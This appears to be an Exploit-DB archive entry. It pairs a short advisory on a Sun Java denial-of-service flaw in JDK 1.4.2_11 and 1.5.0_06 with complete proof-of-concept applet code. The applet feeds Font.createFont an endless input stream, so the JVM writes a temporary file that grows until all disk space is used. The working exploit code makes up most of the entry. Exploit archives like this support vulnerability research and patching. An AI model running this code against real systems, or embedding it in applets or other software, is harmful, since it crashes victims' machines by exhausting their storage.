exploit-db-mirror/exploits/java/dos/27882.java
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

48 lines
No EOL
1.1 KiB
Java

source: http://www.securityfocus.com/bid/17981/info
Sun Java is prone to a remote denial-of-service vulnerability because the application fails to properly handle certain Java applets.
Successfully exploiting this issue will cause the application to create a temporary file that will grow in an unbounded fashion, consuming all available disk space. This will likely result in a denial-of-service condition.
Sun Java JDK 1.4.2_11 and 1.5.0_06 are vulnerable; other versions may also be affected.
import java.applet.Applet;
import java.awt.Font;
import java.io.InputStream;
class MIS extends InputStream
{
MIS()
{
}
public int read()
{
return 0;
}
public int read(byte abyte0[], int i, int j)
{
return j - i;
}
}
public class FontCreatorFullDiskApplet extends Applet
{
public FontCreatorFullDiskApplet()
{
}
static
{
try
{
byte abyte0[] = new byte[0];
Font font = Font.createFont(0, new MIS());
}
catch(Exception exception) { }
}
}